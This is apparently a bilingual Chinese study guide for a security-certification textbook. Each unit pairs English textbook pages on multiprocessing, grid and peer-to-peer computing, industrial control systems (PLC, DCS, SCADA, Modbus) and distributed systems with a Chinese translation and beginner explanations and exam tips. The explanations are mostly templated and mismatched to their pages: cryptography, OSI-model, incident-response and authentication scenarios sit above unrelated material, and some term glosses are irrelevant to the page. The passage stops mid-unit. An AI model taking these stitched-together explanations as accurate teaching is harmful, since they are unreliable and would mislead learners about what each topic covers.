When the software that coordinates the entire system's activities and schedules them for processing encounters a computationally intensive task, it assigns

中文直译 / 整理

并行数据系统或并行计算是一种旨在同时执行大量计算的计算系统。 然而,并 行数据系统通常远远超出基本的多处理能力。 它们通常包含将大型任务划分为 较小元素的概念,然后将每个子元素分配给不同的处理子系统进行并行计算。 这种实现基于这样的理念:某些问题如果被分解为可以并发处理的较小任务, 则可以更高效地解决。 并行数据处理可以通过使用独立的CPU、多核CPU、虚 拟系统或这些的任意组合来实现。 大规模并行数据系统还必须关注性能、功耗 以及可靠性/稳定性问题。 在多处理或并行处理领域中存在若干分类。 第一类区分是对称多处理(SMP) 和非对称多处理(AMP)。 当一台计算机包含多个被平等对待并由单一操作系统控制的处理器时,这种情 况称为 对称多处理(SMP)。 在SMP中,处理器不仅共享一个公共的操作系 统,还共享公共的数据总线和内存资源。 在这种架构下,系统可以使用大量处 理器。 这些处理器集合共同处理单一或主要的任务、代码或项目。 在 非对称多处理(AMP) 中,处理器通常彼此独立运行。 通常,每个处理器 都有自己的操作系统和/或任务指令集,以及专用的数据总线和内存资源。

在 AMP下,处理器可以被配置为仅执行特定代码或处理特定任务(或仅允许特定 代码或任务在特定处理器上运行; 在某些情况下,这可能被称为亲和性)。 AMP 的一种变体是 大规模并行处理(MPP),其中多个 AMP 系统连接在一 起,跨多个链接系统中的多个进程协同完成单一主要任务。 某些计算密集型操 作,例如支持科学家和数学家研究的操作,需要比单个操作系统所能提供的更 强的处理能力。 MPP 最适合此类操作。 MPP 系统包含数百甚至数千个处理器, 每个处理器都拥有自己的操作系统和内存/总线资源。 一些 MPP 系统拥有超过 一千万个执行核心。 当协调整个系统活动并调度其处理的软件遇到计算密集型 任务时,它会分配

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 577 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 35 / PDF P578

第 578 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

responsibility for the task to a single processor (not so different from the Master Control Program [MCP] in the popular movie “Tron”). This processor breaks the task into manageable parts and distributes them to other processors for execution. Those processors return their results to the coordinating processor, where they are assembled and returned to the requesting application. MPP systems are extremely powerful (not to mention extremely expensive!) and are used in a great deal of computing or computational-based research. Both types of multiprocessing provide unique advantages and are suitable for different types of situations.

SMP systems are adept at processing simple operations at extremely high rates, whereas MPP systems are uniquely suited for processing very large, complex, computationally intensive tasks that lend themselves to decomposition and distribution into a number of subordinate parts. The arena of large-scale parallel data systems is still evolving. It is likely that many management issues are yet to be discovered and solutions to known issues are still being sought. Large-scale parallel data management is likely a key tool in managing big data and will often involve cloud computing (see Chapter 16), grid computing, or peer-to-peer computing solutions.

Grid Computing Grid computing is a form of parallel distributed processing that loosely groups a significant number of processing nodes to work toward a specific processing goal. Members of the grid can enter and leave the grid at random intervals. Often, members join the grid only when their processing capacities are not being taxed for local workloads. When a system is otherwise in an idle state, it could join a grid group, download a small portion of work, and begin calculations. When a system leaves the grid, it saves its work and may upload completed or partial work elements back to the grid.

Many interesting uses of grid computing have developed, including projects seeking out intelligent aliens, performing protein folding, predicting the weather, modeling earthquakes, planning financial decisions, and solving for primes. The biggest security concern with grid computing is that the content of each work packet is potentially exposed to the world. Many grid computing projects are open to the world, so there is no restriction on who can run the local processing application and participate in the grid's project. This also means that grid members could keep copies of each work packet and examine

中文直译 / 整理

该任务的责任给单个处理器(这与热门电影《电子世界争霸战》中的主控程序 [MCP] 并无太大不同)。 该处理器将任务分解为可管理的部分,并分发给其 他处理器执行。 这些处理器将结果返回给协调处理器,在那里进行组装并返回 给请求的应用程序。 MPP 系统极为强大(更不用说极为昂贵了! ),广泛用 于大量计算或基于计算的研究中。 这两种并行处理方式各自具有独特的优势,适用于不同的场景。 SMP 系统擅长 以极高的速率处理简单操作,而 MPP 系统则特别适合处理非常庞大、复杂且 计算密集型的任务,这些任务可以分解并分布为多个子部分。 大规模并行数据系统的领域仍在不断发展。 许多管理问题仍有待发现,已知问 题的解决方案仍在探索中。 大规模并行数据管理很可能是管理大数据的关键工 具,通常会涉及云计算(参见第16章)、网格计算或点对点计算解决方案。 网格计算 网格计算是一种并行分布式处理形式,它将大量处理节点松散地组合起来,以 实现特定的处理目标。 网格成员可以随机地加入或离开网格。 通常,成员仅在 本地工作负载未占用其处理能力时才加入网格。 当系统处于空闲状态时,它可 以加入网格组,下载一小部分任务并开始计算。

当系统离开网格时,它会保存 工作成果,并将已完成或部分完成的工作单元上传回网格。 网格计算已发展出 许多有趣的应用,包括寻找智能外星生命、进行蛋白质折叠、预测天气、模拟 地震、规划财务决策以及求解质数等项目。 网格计算最大的安全顾虑在于,每个工作包的内容都有可能暴露于外界。 许多 网格计算项目对全球开放,因此任何人都可以运行本地处理应用程序并参与网 格项目。 这也意味着网格成员可能会保留每个工作包的副本并进行检查

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 578 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 36 / PDF P579

第 579 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

the contents. Thus, grid projects will not likely be able to maintain secrecy and are not appropriate for private, confidential, or proprietary data. Grid computing can also vary greatly in computational capacity from moment to moment. Work packets are sometimes not returned, returned late, or returned corrupted. This requires significant reworking and causes instability in the speed, progress, responsiveness, and latency of the project as a whole and with individual grid members. Time-sensitive projects might not be given sufficient computational time to finish by a specific chronological deadline.

Grid computing often uses a central primary core of servers to manage the project, track work packets, and integrate returned work segments. If the central servers are overloaded or go offline, complete failure or crashing of the grid can occur. However, when central grid systems are inaccessible, grid members usually complete their current local tasks and then regularly poll to discover when the central servers come back online. There is also a potential risk that a compromise of the central grid servers could be leveraged to attack grid members or trick grid members into performing malicious actions instead of the intended purpose of the grid community.

Peer to Peer Peer-to-peer (P2P) technologies are networking and distributed application solutions that share tasks and workloads among peers. This is similar to grid computing; the primary differences are that there is no central management system, and the services are usually provided in real time rather than as a collection of computational power. Common examples of P2P include many VoIP services, BitTorrent (for data/file distribution), and tools for streaming audio/music distribution.

Security concerns with P2P solutions include a perceived inducement to pirate copyrighted materials, the ability to eavesdrop on distributed content, a lack of central control/oversight/management/filtering, and the potential for services to consume all available bandwidth. Industrial Control Systems An industrial control system (ICS) is a form of computer-management device that controls industrial processes and machines, also known as operational technology (OT) (and also industrial IoT [IIOT]; see the section “Internet of Things”). ICSs are used across a wide range of industries, including

中文直译 / 整理

其内容。 因此,网格项目不太可能保持机密性,不适合用于私人、保密或专有 数据。 网格计算的计算能力也可能随时间而大幅波动。 工作包有时不会返回、延迟返 回或返回时已损坏。 这需要大量重新处理,并导致整个项目以及各个网格成员 的速度、进度、响应性和延迟出现不稳定。 对于时间敏感的项目,可能无法在 特定的时间截止前获得足够的计算时间来完成。 网格计算通常使用一组中心主服务器来管理项目、跟踪工作包并整合返回的工 作片段。 如果中心服务器过载或离线,可能导致网格完全失效或崩溃。 然而, 当中心网格系统无法访问时,网格成员通常会完成当前的本地任务,然后定期 轮询以检测中心服务器何时重新上线。 此外,还存在一种潜在风险:中心网格 服务器被攻破后,可能被用来攻击网格成员,或诱骗网格成员执行恶意操作, 而非实现网格社区的预期目的。 点对点 点对点(P2P)技术是一种网络和分布式应用解决方案,能够在对等节点之间 共享任务和工作负载。 这与网格计算类似; 主要区别在于没有中心管理系统, 且服务通常以实时方式提供,而非作为计算能力的集合。

P2P的常见示例包括 许多VoIP服务、BitTorrent(用于数据/文件分发)以及流式音频/音乐分发工 具。 P2P解决方案的安全问题包括:被认为会诱导盗版受版权保护的材料、能够窃 听分布式内容、缺乏集中控制/监督/管理/过滤,以及服务可能耗尽所有可用带 宽的可能性。 工业控制系统 一个工业控制系统(ICS)是一种用于控制工业流程和机器的计算机管理设备, 也称为运营技术(OT)(以及工业物联网[IIOT]; 参见“物联网”一节)。 ICS广泛应用于各种行业,包括

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 579 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 37 / PDF P580

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

manufacturing, fabrication, electricity generation and distribution, water distribution, sewage processing, and oil refining. There are several forms of ICS, such as programmable logic controllers (PLCs), distributed control systems (DCSs), and supervisory control and data acquisition (SCADA). PLC units are effectively single-purpose or focused-purpose digital computers. They are typically deployed for managing and automating various industrial electromechanical operations, such as controlling systems on an assembly line or a large-scale digital light display (such as a giant display system in a stadium or on a Las Vegas Strip marquee).

DCS units are typically found in industrial process plants where gathering data and implementing control over a large-scale environment from a single location is essential. An important aspect of DCS is that the controlling elements are distributed across the monitored environment, such as a manufacturing floor or a production line, and the centralized monitoring location sends commands out of those localized controllers while gathering status and performance data. A DCS might be analog or digital, depending on the task or the device being controlled. For example, a liquid flow value DCS would be an analog system, whereas an electric voltage regulator DCS would likely be a digital system.

A SCADA system can operate as a stand-alone device, be networked together with other SCADA systems, or be networked with traditional IT systems. SCADA typically includes a human-machine interface (HMI) to enable personnel to oversee, manage, and control the complex industrial machine and technology systems. SCADA is used to monitor and control a wide range of industrial processes. SCADA can communicate with PLCs and DCS solutions. A DCS focuses on processes and is state driven, whereas SCADA focuses on data-gathering and is event driven. DCS is more suited to operating on a limited scale, whereas SCADA is suitable for managing systems over large geographic areas.

Legacy SCADA systems were designed with minimal human interfaces. Often, they used mechanical buttons and knobs or simple LCD screen interfaces (similar to what you might have on a business printer or a GPS navigation device). However, modern networked SCADA devices may have more complex remote-control software interfaces.

中文直译 / 整理

制造、加工、电力生产和分配、供水、污水处理和石油精炼。 ICS有多种形 式,例如可编程逻辑控制器(PLC)、分布式控制系统(DCS)和监督控制 和数据采集系统(SCADA)。 PLC单元本质上是单一用途或专用目的的数字计算机。 它们通常用于管理和自 动化各种工业机电操作,例如控制装配线上的系统或大规模数字灯光显示系统 (如体育场或拉斯维加斯大道广告牌上的巨型显示屏)。 DCS单元通常存在于工业过程工厂中,这些工厂需要从单一位置收集数据并实 施对大规模环境的控制。 DCS的一个重要特点是,控制元件分布在被监控的环 境中,例如制造车间或生产线,而集中监控位置会向这些本地控制器发送指令, 同时收集状态和性能数据。 DCS可以是模拟系统或数字系统,具体取决于任务 或被控制的设备。 例如,液体流量值DCS将是模拟系统,而电压调节器DCS则 可能是数字系统。 SCADA系统可以作为独立设备运行,也可以与其他SCADA系统联网,或与传 统IT系统联网。 SCADA通常包括人机界面(HMI),以便人员监督、管理和 控制复杂的工业机械和技术系统。 SCADA用于监控和控制广泛的工业过程, 并可与PLC和DCS解决方案通信。

DCS专注于过程且以状态驱动,而SCADA专注于数据采集且以事件驱动。 DCS更适合在有限规模上运行,而SCADA则适用于管理大地理区域内的系统。 传统的SCADA系统设计时仅配备了最简化的用户界面。 它们通常使用机械按钮 和旋钮,或简单的LCD屏幕界面(类似于您在商用打印机或GPS导航设备上可 能见到的界面)。 然而,现代网络化的SCADA设备可能具备更复杂的远程控制 软件界面。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 38 / PDF P581

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

A PLC is used to control a single device in a stand-alone manner. DCS was used to interconnect several PLCs within a limited physical range to gain centralized control, management, and oversight through networking. SCADA expanded this to large-scale physical areas to interconnect multiple DCSs and individual PLCs. For example, a PLC can control a single transformer, a DCS can manage a power station, and SCADA can oversee a power grid. Modbus is a widely used communication protocol in industrial automation and control systems. Developed by Modicon (now part of Schneider Electric) in 1979, Modbus has become a de facto standard for connecting and managing devices within industrial environments.

It provides a common language for different devices to exchange data and commands, facilitating communication in SCADA systems, PLCs, and other industrial applications. The open standard nature of Modbus fosters interoperability, a crucial requirement in ICS and SCADA environments where diverse devices from different manufacturers must seamlessly interact. In theory, the static design of PLC, DCS, and SCADA and their minimal human interfaces should make the system fairly resistant to compromise or modification. Thus, little security was built into these industrial control devices, especially in the past.

But there have been several well-known compromises of industrial control systems in recent years; for example, Stuxnet delivered the first-ever-known rootkit to a SCADA system located in a nuclear facility. Many SCADA vendors have started implementing security improvements into their solutions to prevent or at least reduce future compromises. However, in practice, SCADA and ICS systems are still often poorly secured, vulnerable, and infrequently updated, and older versions not designed for security are still in widespread use.

Generally, typical security management and hardening processes can be applied to ICS, DCS, PLC, and SCADA systems to improve on whatever security is or isn't present in the device from the manufacturer. Common important security controls include isolating networks, limiting access physically and logically, restricting code to only essential applications, changing default credentials, and logging all activity. While confidentiality and integrity are often important considerations, the primary concern for OT/ICS is ensuring the availability of real-time control signals. Immediate PLC

中文直译 / 整理

用于以独立方式控制单个设备。 DCS用于在有限的物理范围内将多 个PLC互连,以通过网络实现集中控制、管理和监控。 SCADA则将这一概 念扩展到大范围的物理区域,以互连多个DCS和独立的PLC。 例如,一个 PLC可以控制单台变压器,一个DCS可以管理一座发电站,而SCADA可以 监控整个电网。 Modbus 是工业自动化和控制系统中广泛使用的通信协议。 该协议由 Modicon(现为施耐德电气的一部分)于 1979 年开发,已成为工业环境中连 接和管理设备的事实标准。 它为不同设备提供了交换数据和命令的通用语言, 促进了 SCADA 系统、PLC 及其他工业应用中的通信。 Modbus 的开放标准特 性促进了互操作性,这是 ICS 和 SCADA 环境中的关键要求,因为在这些环境 中,来自不同制造商的多样化设备必须无缝交互。 理论上,PLC、DCS 和 SCADA 的静态设计及其最小化的人机界面应使系统具 有相当强的抗攻击或篡改能力。 因此,过去这些工业控制设备几乎没有内置安 全机制。 但近年来,已发生多起著名的工业控制系统被攻破事件;

例如, Stuxnet 向位于核设施的 SCADA 系统传递了首个已知的 rootkit。 许多 SCADA 供应商已开始在其解决方案中实施安全改进措施,以防止或至少减少未 来的攻击。 然而,实践中,SCADA 和 ICS 系统仍常常安全防护薄弱、易受攻 击且更新频率低,许多未针对安全性设计的旧版本仍在广泛使用。 通常,可以将典型的安全管理和加固流程应用于ICS、DCS、PLC和 SCADA系统,以改善设备制造商提供的任何安全措施。 常见的关键安全控 制措施包括隔离网络、物理和逻辑上限制访问、仅允许运行必要应用程序的 代码、更改默认凭证以及记录所有活动。 虽然机密性和完整性通常是重要的 考虑因素,但OT/ICS的主要关注点是确保实时控制信号的可用性。 立即

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 39 / PDF P582

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

and continuous availability of control signals is critical for the proper functioning of industrial processes. Otherwise, catastrophic consequences could result. The ISA99 standards development committee has established and is maintaining guidelines for securing ICS, DCS, PLC, and SCADA systems. Much of their work is integrated into the International Electrotechnical Commission's (IEC) 62443 series of standards. To learn more about these standards, visit www.isa.org and iecee.org. NIST maintains ICS security standards in SP 800-82rs (nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf).

North American Electric Reliability Corporation (NERC) maintains its own security guides for ICS (www.nerc.com), which are similar to those of the European Reference Network for Critical Infrastructure Protection (ERNCIP) (erncip-project.jrc.ec.europa.eu). Distributed Systems A distributed system or a distributed computing environment (DCE) is a collection of individual systems that work together to support a resource or provide a service. Often, a DCE is perceived by users as a single entity rather than numerous individual servers or components. DCEs are designed to support communication and coordination among their members to achieve a common function, goal, or operation.

Some DCE systems are composed of homogenous members; others are composed of heterogeneous systems. Distributed systems can be implemented to provide resiliency, reliability, performance, and scalability benefits. Most DCEs exhibit numerous duplicate or concurrent components, are asynchronous, and allow for fail-soft or independent failure of components. A DCE is also known as (or at least described as) concurrent computing, parallel computing, and distributed computing.

DCE solutions are implemented as client-server architectures (see the previous client and server sections as well as endpoint coverage in Chapter 11), as a three-tier architecture (such as basic web applications), as multitiered architectures (such as advanced web applications), and as peer-topeer architectures (such as BitTorrent and most cryptocurrency blockchain ledgers as discussed in Chapter 7). DCE solutions are often employed for scientific and medical research projects, education projects, and industrial applications requiring extensive computational resources.

中文直译 / 整理

且控制信号的持续可用性对于工业过程的正常运行至关重要。 否则,可能导 致灾难性后果。 ISA99标准开发委员会已制定并维护了关于保护ICS、DCS、PLC和 SCADA系统的指南。 他们的大量工作已整合到国际电工委员会(IEC)的 62443系列标准中。 要了解更多关于这些标准的信息,请访问www.isa.org 和iecee.org。 NIST在SP 800‑82rs中维护ICS安全标准 (nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf)。 北 美电力可靠性公司(NERC)维护其自身的ICS安全指南(www.nerc.com),这 些指南与欧洲关键基础设施保护参考网络(ERNCIP)( erncip-project.jrc.ec.europa.eu)的指南相似。 分布式系统 A 分布式系统 或 分布式计算环境(DCE) 是一组协同工作的独立系统,用于支 持资源或提供服务。 通常,用户将 DCE 视为一个单一实体,而非众多独立的服 务器或组件。 DCE 的设计旨在支持其成员之间的通信与协调,以实现共同的功 能、目标或操作。

一些 DCE 系统由同构成员组成; 另一些则由异构系统组成。 分布式系统可以实现弹性、可靠性、性能和可扩展性等优势。 大多数 DCE 具有 大量重复或并发组件,是异步的,并允许组件出现软故障或独立故障。 DCE 也 被称为(或至少被描述为)并发计算、并行计算和分布式计算。 DCE 解决方案 通常采用客户端‑服务器架构(参见前文的客户端和服务器部分以及第 第 11 章 中的端点覆盖内容),三层架构(如基本的 Web 应用程序),多层架构(如高 级 Web 应用程序),以及对等架构(如 BitTorrent 和第 第 7 章 中讨论的大 多数加密货币区块链账本)。 DCE 解决方案常用于科学和医学研究项目、教育 项目,以及需要大量计算资源的工业应用。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 40 / PDF P583

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

DCE forms the backbone of a wide range of modern Internet, business, and communication technologies that you might regularly use, including DNS, single-sign-on, directory services, massively multiplayer online role-playing games (MMORPGs), mobile networks, and most websites. DCE also makes possible a plethora of advanced technologies such as service-oriented architecture (SOA), software-defined networking (SDN), microservices, and so on. A DCE typically includes an interface definition language (IDL). An IDL is a language used to define the interface between client and server processes or objects in a distributed system.

IDL enables the creation of interfaces between objects when those objects are in varying locations or are using different programming languages; thus, IDL interfaces are languageindependent and location-independent. There are numerous examples of DCE IDLs or frameworks, such as remote procedure calls (RPCs), the Common Object Request Broker Architecture (CORBA), and the Distributed Component Object Model (DCOM). There are some security issues inherent with DCE. The primary security concern is the interconnectedness of the components.

This configuration could allow for error or malware propagation, and if an adversary compromises one component, it may grant them the ability to compromise other components in the collective through pivoting and lateral movement.

Other common issues to consider and address include the following: Access by unauthorized users Masquerading, impersonation, and spoofing attacks of users and/or devices Security control bypass or deactivating Communication eavesdropping and manipulation Insufficient authentication and authorization A lack of monitoring, auditing, and logging Failing to enforce accountability The issues in this list are not unique to DCE, but they are especially problematic in a distributed system. Since distributed systems include members that may be distributed geographically, they have a larger potential attack surface than that of a single DCE

中文直译 / 整理

构成了您可能日常使用的广泛现代互联网、商业和通信技术的骨干,包 括 DNS、单点登录、目录服务、大型多人在线角色扮演游戏(MMORPG)、 移动网络和大多数网站。 DCE 还使许多先进技术成为可能,例如面向服务的 架构(SOA)、软件定义网络(SDN)、微服务等。 DCE 通常包括一个 接口定义语言(IDL)。 IDL 是一种用于定义分布式系统 中客户端与服务器进程或对象之间接口的语言。 IDL 使得当这些对象位于不同 位置或使用不同编程语言时,仍能创建接口; 因此,IDL 接口是语言无关且位 置无关的。 DCE IDL 或框架的示例众多,例如远程过程调用(RPC)、公共 对象请求代理架构(CORBA)和分布式组件对象模型(DCOM)。 DCE 存在一些固有的安全问题。 主要的安全顾虑在于各组件之间的互连性。 这种配置可能导致错误或恶意软件传播,如果攻击者破坏了其中一个组件, 可能通过横向移动和跳板攻击获得破坏集合中其他组件的能力。

其他需要考 虑和解决的常见问题包括: 未经授权的用户访问 用户和/或设备的冒充、伪装和欺骗攻击 绕过或禁用安全控制 通信窃听与篡改 身份验证和授权不足 缺乏监控、审计和日志记录 未能强制执行问责制 本列表中的问题并非DCE独有,但在分布式系统中尤为突出。 由于分布式系统包含可能分布在地理上不同位置的成员,其潜在攻击面比单个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

